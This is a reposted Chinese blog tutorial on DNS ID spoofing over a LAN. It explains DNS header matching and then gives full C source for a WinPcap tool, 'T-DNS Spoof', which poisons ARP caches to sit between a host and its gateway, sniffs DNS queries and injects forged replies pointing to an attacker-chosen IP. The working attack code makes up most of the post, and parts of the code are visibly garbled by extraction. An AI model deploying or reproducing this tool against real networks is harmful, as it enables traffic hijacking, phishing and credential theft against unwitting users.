Chinaunix首页 | 论坛 | 博客
  • 博客访问: 23558
  • 博文数量: 13
  • 博客积分: 15
  • 博客等级: 民兵
  • 技术积分: 75
  • 用 户 组: 普通用户
  • 注册时间: 2012-01-18 17:45
文章分类
文章存档

2012年(13)

我的朋友
最近访客

分类:

2012-02-14 23:36:52

原文地址:DNS欺骗的实现 作者:skyajlm

域名系统(DNS)是一种用于TCP/IP应用程序的分布式数据库,它提供主机名字和IP地址之间的转换信息。通常,用户通过UDP协议和进行,而服务器在特定的53 端口监听,并返回用户所需的相关信息。

  一.DNS协议的相关数据结构

  DNS数据报:

  typedef struct dns

  {

  unsigned short id;

  //标识,通过它客户端可以将DNS的请求与应答相匹配;

  unsigned short flags;

  //标志:[QR | opcode | AA| TC| RD| RA | zero | rcode ]

  unsigned short quests;

  //问题数目;

  unsigned short answers;

  //资源记录数目;

  unsigned short author;

  //授权资源记录数目;

  unsigned short addition;

  //额外资源记录数目;

  }DNS,*PDNS;

  在16位的标志中:QR位判断是查询/响应报文,opcode区别查询类型,AA判断是否为授权回答,TC判断是否可截断,RD判断是否期望递归查询,RA判断是否为可用递归,zero必须为0,rcode为返回码字段。

  DNS查询数据报:

  typedef struct query

  {

  unsinged char *name;

  //查询的域名,这是一个大小在0到63之间的字符串;

  unsigned short type;

  //查询类型,大约有20个不同的类型

  unsigned short classes;

  //查询类,通常是A类既查询IP地址。

  }QUERY,*PQUERY;

  DNS响应数据报:

  typedef struct response

  {

  unsigned short name;

  //查询的域名

  unsigned short type;

  //查询类型

  unsigned short classes;

  //类型码

  unsigned int  ttl;

  //生存时间

  unsigned short length;

  //资源数据长度

  unsigned int  addr;

  //资源数据

  }RESPONSE,*PRESPONSE;

  二.下DNS ID欺骗的原理

  我们可以看到,在DNS数据报头部的id(标识)是用来匹配响应和请求数据报的。现在,让我们来看看域名解析的整个过程。客户端首先以特定的标识向DNS服务器发送域名查询数据报,在DNS服务器查询之后以相同的ID号给客户端发送域名响应数据报。这时客户端会将收到的DNS响应数据报的ID和自己发送的查询数据报ID相比较,如果匹配则表明接收到的正是自己等待的数据报,如果不匹配则丢弃之。

  假如我们能够伪装DNS服务器提前向客户端发送响应数据报,那么客户端的DNS缓存里域名所对应的IP就是我们自定义的IP了,同时客户端也就被带到了我们希望的网站。条件只有一个,那就是我们发送的ID匹配的DSN响应数据报在DNS服务器发送的响应数据报之前到达客户端。下图清楚的展现了DNS ID欺骗的过程:

  Client <--response--| . . . . . .. . . . . . . . . . DNS Server

  |<--[a.b.c == 112.112.112.112]-- Your Computer

  到此,我想大家都知道了DNS ID欺骗的实质了,那么如何才能实现呢?这要分两种情况:

  1. 本地主机与DNS服务器,本地主机与客户端主机均不在同一个局域网内,方法有以下几种:向客户端主机随机发送大量DNS响应数据报,命中率很低;向DNS服务器发起拒绝服务攻击,太粗鲁;BIND漏洞,使用范围比较窄。

  2. 本地主机至少与DNS服务器或客户端主机中的某一台处在同一个局域网内:我们可以通过ARP欺骗来实现可靠而稳定的DNS ID欺骗,下面我们将详细讨论这种情况。

  首先我们进行DNS ID欺骗的基础是ARP欺骗,也就是在局域网内同时欺骗网关和客户端主机(也可能是欺骗网关和DNS服务器,或欺骗DNS服务器和客户端主机)。我们以客户端的名义向网关发送ARP响应数据报,不过其中将源MAC地址改为我们自己主机的MAC地址;同时以网关的名义向客户端主机发送ARP响应数据报,同样将源MAC地址改为我们自己主机的MAC地址。这样以来,网关看来客户端的MAC地址就是我们主机的MAC地址;客户端也认为网关的MAC地址为我们主机的MAC地址。由于在局域网内数据报的传送是建立在MAC地址之上了,所以网关和客户端之间的数据流通必须先通过本地主机。

  在监视网关和客户端主机之间的数据报时,如果发现了客户端发送的DNS查询数据报(目的端口为53),那么我们可以提前将自己构造的DNS响应数据报发送到客户端。注意,我们必须提取有客户端发送来的DNS查询数据报的ID信息,因为客户端是通过它来进行匹配认证的,这就是一个我们可以利用的DNS漏洞。这样客户端会先收到我们发送的DNS响应数据报并访问我们自定义的网站,虽然客户端也会收到DNS服务器的响应报文,不过已经来不及了,哈哈。

  三.核心代码分析

  主程序创建两个线程,一个线程进行实时的ARP欺骗,另一个线程监听接收到的数据报,若发现有域名服务查询数据报,则立即向客户端发送自定义的DSN响应数据报。测试环境: + VC6.0 + Winpcap_3.0_alpha,:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1。

  1.sniff线程:

  PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS);

  //将网卡设置为混杂模式

  PacketSetBuff(lpadapter,500*1024);

  //设置网络适配器的内核缓存;

  PacketSetReadTimeout(lpadapter,1);

  //设置等待时间;

  PacketReceivePacket(lpadapter,lppacketr,TRUE);

  //接收网络数据报;

  checksum((USHORT *)temp,sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

  //计算校验和;

  PacketInitPacket(lppackets,sendbuf,sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+4+sizeof(RESPONSE));

  //初始化一个_PACKET结构,发送DNS响应数据报;

  2.arpspoof线程;

  PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

  //初始化ARP响应数据报;

  PacketSendPacket(lpadapter,lppackets,TRUE);

  //发送ARP欺骗的响应数据报;

  3.getmac()函数

  GetAdaptersInfo(padapterinfo,&adapterinfosize);

  //获取网络适配器的属性;

  SendARP(destip,0,pulmac,&ullen);

  //发送ARP请求数据报,过去网络主机的MAC地址;

  4.main()函数

  PacketGetAdapterNames((char *)adaptername,&adapterlength);

  //获得本地主机的网络适配器列表和描述;

  lpadapter=PacketOpenAdapter(adapterlist[open-1]);

  //打开指定的网络适配器;

  CreateThread(NULL,0,sniff,NULL,0,&threadrid);

  CreateThread(NULL,0,arpspoof,NULL,0,&threadsid);

  //创建两个线程;

  WaitForMultipleObjects(2,thread,FALSE,INFINITE);

  //等待其中的某个线程结束;

  四.小结与后记

  局域网内的是一个值得大家关注的问题,往往容易发起各种欺骗攻击,这是局域网自身的属性所决定的--网络共享。本文所讲解的DNS ID欺骗是基于ARP欺骗之上的网络攻击,如果在广域网上,则比较麻烦。不过也有一些例外情况:如果IE中使用,欺骗不能进行,因为这时客户端并不会在本地进行域名请求;如果你访问的不是网站主页,而是相关子目录的文件,这样你在自定义的网站上不会找到相关的文件,登陆以失败告终。如果你不幸被欺骗了,先禁用本地连接,然后启用本地连接就可以清除DNS缓存。

  五.附件源代码

  #include

  #include

  #include

  #define ETH_IP            0x0800

  #define ETH_ARP

  0x0806

  #define ARP_REQUEST         0x0001

  #define ARP_REPLY          0x0002

  #define ARP_HARDWARE         0x0001

  #define MAX_NUM_ADAPTER       10

  #define NDIS_PACKET_TYPE_PROMISCUOUS 0x0020

  #pragma pack(push,1)

  typedef struct ethdr

  {

  unsigned char eh_dst[6];

  unsigned char eh_src[6];

  unsigned short eh_type;

  }ETHDR,*PETHDR;

  typedef struct arphdr

  {

  unsigned short arp_hdr;

  unsigned short arp_pro;

  unsigned char  arp_hln;

  unsigned char  arp_pln;

  unsigned short arp_opt;

  unsigned char  arp_sha[6];

  unsigned long  arp_spa;

  unsigned char  arp_tha[6];

  unsigned long  arp_tpa;

  }ARPHDR,*PARPHDR;

  typedef struct iphdr

  {

  unsigned char h_lenver;

  unsigned char tos;

  unsigned short total_len;

  unsigned short ident;

  unsigned short frag_and_flags;

  unsigned char ttl;

  unsigned char protocol;

  unsigned short checksum;

  unsigned int  sourceip;

  unsigned int  destip;

  }IPHDR,*PIPHDR;

  typedef struct psd

  {

  unsigned int  saddr;

  unsigned int  daddr;

  char      mbz;

  char      ptcl;

  unsigned short udpl;

  }PSD,*PPSD;

  typedef struct udphdr

  {

  unsigned short souceport;

  unsigned short destport;

  unsigned short length;

  unsigned short checksum;

  }UDPHDR,*PUDPHDR;

  typedef struct dns

  {

  unsigned short id;

  unsigned short flags;

  unsigned short quests;

  unsigned short answers;

  unsigned short author;

  unsigned short addition;

  }DNS,*PDNS;

  typedef struct query

  {

  unsigned short type;

  unsigned short classes;

  }QUERY,*PQUERY;

  typedef struct response

  {

  unsigned short name;

  unsigned short type;

  unsigned short classes;

  unsigned int  ttl;

  unsigned short length;

  unsigned int  addr;

  }RESPONSE,*PRESPONSE;

  #pragma pack(pop)

  unsigned short checksum(USHORT *buffer,int size)

  {

  unsigned long cksum=0;

  while(size>1)

  {

  cksum+=*buffer++;

  size-=sizeof(unsigned short);

  }

  if(size)

  cksum+=*buffer;

  cksum=(cksum>>16)+(cksum & 0xffff);

  cksum+=(cksum>>16);

  return (unsigned short)(~cksum);

  }

  LPADAPTER lpadapter=0;

  LPPACKET lppacketr,lppackets;

  IPAddr  myip,firstip,secondip,virtualip;

  UCHAR   mmac[6]={0},fmac[6]={0},smac[6]={0};

  char   adapterlist[MAX_NUM_ADAPTER][1024];

  void start()

  {

  printf("===[ T-DNS Spoof, by TOo2y    ]===\n");

  printf("===[ TOo2y@safechina.net ]===\n");

  printf(

  "===[ Homepage: ]===\n");

  printf("===[ Date: 10-15-2002      ]===\n\n");

  return;

  }

  void usage()

  {

  printf("Usage: T-DNS Firstip Secondip Virtualip\n");

  return;

  }

  D WINAPI sniff(LPVOID no)

  {

  printf("\nI am sniffing...\n");

  char   *buf;

  char   *pchar;

  char   temp[1024];

  char   sendbuf[1024];

  char   recvbuf[1024*250];

  struct  bpf_hdr   *hdr;

  unsigned char    *dname;

  unsigned long    ulbytesreceived,off,ulen;

  ETHDR  ethr,eths;

  IPHDR  ipr,ips;

  PSD   psds;

  UDPHDR  udpr,udps;

  DNS   dnsr,dnss;

  QUERY  queryr,querys;

  RESPONSE responses;

   if(PacketSetHwFilter(lpadapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)

  {

  printf("Warning: Unable to set the adapter to promiscuous mode!\n");

  }

  if(PacketSetBuff(lpadapter,500*1024)==FALSE)

  {

  printf("PacketSetBuff Error: %d\n",GetLastError());

  return -1;

  }

  if(PacketSetReadTimeout(lpadapter,1)==FALSE)

  {

  printf("Warning: Unable to set the timeout!\n");

  }

  if((lppacketr=PacketAllocatePacket())==FALSE)

  {

  printf("PacketAllocatePacket Receive Error: %d\n",GetLastError());

  return -1;

  }

  PacketInitPacket(lppacketr,(char *)recvbuf,sizeof(recvbuf));

  while(1)

  {

  if(PacketReceivePacket(lpadapter,lppacketr,TRUE)==FALSE)

  {

  break;

  }

  ulbytesreceived=lppacketr->ulBytesReceived;

  buf=(char *)lppacketr->Buffer;

  off=0;

  while(off

  {

  hdr=(struct bpf_hdr *)(buf+off);

  off+=hdr->bh_hdrlen;

  pchar=(char *)(buf+off);

  off=Packet_ALIGN(off+hdr->bh_caplen);

  ethr=*(ETHDR *)pchar;

  if(ethr.eh_type==htons(ETH_IP))

  {

  ipr=*(IPHDR *)(pchar+sizeof(ETHDR));

  if(ipr.protocol!=17)

  {

  continue;

  }

  if((ipr.sourceip!=secondip) && (ipr.sourceip!=firstip))

  {

  continue;

  }

  udpr=*(UDPHDR *)(pchar+sizeof(ETHDR)+sizeof(IPHDR));

  ulen=ntohs(udpr.length)-sizeof(UDPHDR)-sizeof(DNS)-sizeof(QUERY);

  dname=(unsigned char *)malloc(ulen*sizeof(unsigned char));

  if(udpr.destport==htons(53))

  {

  printf("Get a DNS Packet...\t");

  memset(sendbuf,0,sizeof(sendbuf));

  memcpy(&dnsr,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),sizeof(DNS));

  memcpy(dname,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),ulen);

  memcpy(&queryr.type,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,2);

  memcpy(&queryr.classes,pchar+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+2,2);

  responses.name=htons(0xC00C);

  responses.type=queryr.type;

  responses.classes=queryr.classes;

  responses.ttl=0xFFFFFFFF;

  responses.length=htons(4);

  responses.addr=virtualip;

  querys.classes=queryr.classes;

  querys.type=queryr.type;

  dnss.id=dnsr.id;

  dnss.flags=htons(0x8180);

  dnss.quests=htons(1);

  dnss.answers=htons(1);

  dnss.author=0;

  dnss.addition=0;

  udps.souceport=udpr.destport;

  udps.destport=udpr.souceport;

  udps.length=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

  udps.checksum=0;

  ips.h_lenver=(4<<4|sizeof(IPHDR)/sizeof(unsigned int));

  ips.tos=0;

  ips.total_len=ntohs(sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

  ips.ident=htons(12345);

  ips.frag_and_flags=0;

  ips.ttl=255;

  ips.protocol=IPPROTO_UDP;

  ips.checksum=0;

  ips.sourceip=ipr.destip;

  ips.destip=ipr.sourceip;

  psds.saddr=ips.sourceip;

  psds.daddr=ips.destip;

  psds.mbz=0;

  psds.ptcl=IPPROTO_UDP;

  psds.udpl=htons(sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

  memset(temp,0,sizeof(temp));

  memcpy(temp,&psds,sizeof(PSD));

  memcpy(temp+sizeof(PSD),&udps,sizeof(UDPHDR));

  memcpy(temp+sizeof(

  PSD)+sizeof(UDPHDR),&dnss,sizeof(DNS));

  memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS),dname,ulen);

  memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen,&querys,sizeof(QUERY));

  memcpy(temp+sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY),&responses,sizeof(RESPONSE));

  udps.checksum=checksum((USHORT *)temp,sizeof(PSD)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY)+sizeof(RESPONSE));

  memset(temp,0,sizeof(temp));

  memcpy(temp,&ips,sizeof(IPHDR));

  ips.checksum=checksum((USHORT *)temp,sizeof(IPHDR));

  eths.eh_type=ethr.eh_type;

  memcpy(ðs.eh_src,ðr.eh_dst,6);

  memcpy(ðs.eh_dst,ðr.eh_src,6);

  memcpy(sendbuf,ðs,sizeof(ETHDR));

  memcpy(sendbuf+sizeof(ETHDR),&ips,sizeof(IPHDR));

  memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR),&udps,sizeof(UDPHDR));

  memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR),&dnss,sizeof(DNS));

  memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS),dname,ulen);

  memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen,&querys,sizeof(QUERY));

  memcpy(sendbuf+sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+sizeof(QUERY),&responses,sizeof(RESPONSE));

  PacketInitPacket(lppackets,sendbuf,sizeof(ETHDR)+sizeof(IPHDR)+sizeof(UDPHDR)+sizeof(DNS)+ulen+4+sizeof(RESPONSE));

  if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

  {

  printf("PacketSendPacket in DNS Spoof Error: %d\n",GetLastError());break;

  }

  printf("Send DNS Spoof Packet Successfully!\n");

  }

  }

  }

  }

  return 0;

  }

  DWORD WINAPI arpspoof(LPVOID no)

  {

  printf("I am arpspoofing...\n\n");

  char  sendbuf[1024];

  struct sockaddr_in fsin,ssin;

  ETHDR eth;

  ARPHDR arp;

  fsin.sin_addr.s_addr=firstip;

  ssin.sin_addr.s_addr=secondip;

  eth.eh_type=htons(ETH_ARP);

  arp.arp_hdr=htons(ARP_HARDWARE);

  arp.arp_pro=htons(ETH_IP);

  arp.arp_hln=6;

  arp.arp_pln=4;

  arp.arp_opt=htons(ARP_REPLY);

  do

  {

  memcpy(eth.eh_dst,fmac,6);

  memcpy(arp.arp_tha,fmac,6);

  arp.arp_tpa=firstip;

  arp.arp_spa=secondip;

  memcpy(eth.eh_src,mmac,6);

  memcpy(arp.arp_sha,mmac,6);

  memset(sendbuf,0,sizeof(sendbuf));

  memcpy(sendbuf,ð,sizeof(eth));

  memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

  PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

  if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

  {

  printf("PacketSendPacket in arpspoof Error: %d\n",GetLastError());

  return -1;

  }

  Sleep(500);

  memcpy(eth.eh_dst,smac,6);

  memcpy(arp.arp_tha,smac,6);

  arp.arp_tpa=secondip;

  arp.arp_spa=firstip;

  memcpy(eth.eh_src,mmac,6);

  memcpy(arp.arp_sha,mmac,6);

  memset(sendbuf,0,sizeof(sendbuf));

  memcpy(sendbuf,ð,sizeof(eth));

  memcpy(sendbuf+sizeof(eth),&arp,sizeof(arp));

  PacketInitPacket(lppackets,sendbuf,sizeof(eth)+sizeof(arp));

  if(PacketSendPacket(lpadapter,lppackets,TRUE)==FALSE)

  {

  printf("PacketSendPacket in arpspoof Error: %d\n",GetLastError());

  return -1;

  }

  Sleep(500);

  }while(1);

  return 0;

  }

  BOOL getmac()

  {

  HRESULT hr;

  IPAddr  destip;

  ULONG  pulmac[2];

  ULONG  ullen;

  DWORD       err;

  DWORD       fixedinfosize=0;

  DWORD       adapterinfosize=0;

  PIP_ADAPTER_INFO padapterinfo;

  PIP_ADDR_STRING  paddrstr;

  if((err=GetAdaptersInfo(NULL,&adapterinfosize))!=0)

  {

  if(err!=ERROR_BUFFER_OVERFLOW)

  {

  printf("GetAdapterInfo size Error: %d\n",GetLastError());

  return FALSE;

  }

  }

  if((padapterinfo=(PIP_ADAPTER_INFO)GlobalAlloc(GPTR,adapterinfosize))==NULL)

  {

  printf("Memory allocation Error: %d\n",GetLastError());

  return FALSE;

  }

  if((err=GetAdaptersInfo(padapterinfo,&adapterinfosize))!=0)

  {

  printf("GetAdaptersInfo Error: %d\n",GetLastError());

  return FALSE;

  }

  memcpy(mmac,padapterinfo->Address,6);

  paddrstr=&(padapterinfo->IpAddressList);

  myip=inet_addr(paddrstr->IpAddress.String);

  ullen=6;

  memset(pulmac,0xff,sizeof(pulmac));

  destip=firstip;

  if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)

  {

  printf(

  "SendARP firstip Error: %d\n",GetLastError());

  return FALSE;

  }

  memcpy(fmac,pulmac,6);

  memset(pulmac,0xff,sizeof(pulmac));

  destip=secondip;

  if((hr=SendARP(destip,0,pulmac,&ullen))!=NO_ERROR)

  {

  printf("SendARP secondip Error: %d\n",GetLastError());

  return FALSE;

  }

  memcpy(smac,pulmac,6);

  return TRUE;

  }

  int main(int argc,char *argv[])

  {

  HANDLE  thread[2];

  WCHAR  adaptername[8192];

  WCHAR  *name1,*name2;

  ULONG  adapterlength;

  DWORD  threadsid,threadrid;

  int   adapternum=0,open,i;

  system("cls.exe");

  start();

  if(argc!=4)

  {

  usage();

  return -1;

  }

  firstip=inet_addr(argv[1]);

  secondip=inet_addr(argv[2]);

  virtualip=inet_addr(argv[3]);

  if(getmac()==FALSE)

  {

  return -1;

  }

  adapterlength=sizeof(adaptername);

  if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE)

  {

  printf("PacketGetAdapterNames Error: %d\n",GetLastError());

  return -1;

  }

  name1=adaptername;

  name2=adaptername;

  i=0;

  while((*name1!=\0) || (*(name1-1)!=\0))

  {

  if(*name1==\0)

  {

  memcpy(adapterlist[i],name2,2*(name1-name2));

  name2=name1+1;

  i++;

  }

  name1++;

  }

  adapternum=i;

  printf("Adapters Installed: \n");

  for(i=0;i

  {

  wprintf(L"%d - %s\n",i+1,adapterlist[i]);

  }

  do

  {

  printf("\nSelect the number of the adapter to open: ");

  scanf("%d",&open);

  if(open>=1 && open<=adapternum)

  break;

  }while(open<1 || open>adapternum);

  lpadapter=PacketOpenAdapter(adapterlist[open-1]);

  if(!lpadapter || (lpadapter->hFile==INVALID_HANDLE_VALUE))

  {

  printf("PacketOpenAdapter Error: %d\n",GetLastError());

  return -1;

  }

  if((lppackets=PacketAllocatePacket())==FALSE)

  {

  printf("PacketAllocatePacket Send Error: %d\n",GetLastError());

  return -1;

  }

  thread[0]=CreateThread(NULL,0,sniff,NULL,0,&threadrid);

  if(thread[0]==NULL)

  {

  printf("CreateThread for sniffer Error: %d\n",GetLastError());

  return -1;

  }

  thread[1]=CreateThread(NULL,0,arpspoof,NULL,0,&threadsid);

  if(thread[1]==NULL)

  {

  printf("CreateThread for arpspoof Error: %d\n",GetLastError());

  return -1;

  }

  WaitForMultipleObjects(2,thread,FALSE,INFINITE);

  CloseHandle(thread[0]);

  CloseHandle(thread[1]);

  PacketFreePacket(lppackets);

  PacketFreePacket(lppacketr);

  PacketCloseAdapter(lpadapter);

  return 0;

  }

阅读(778) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~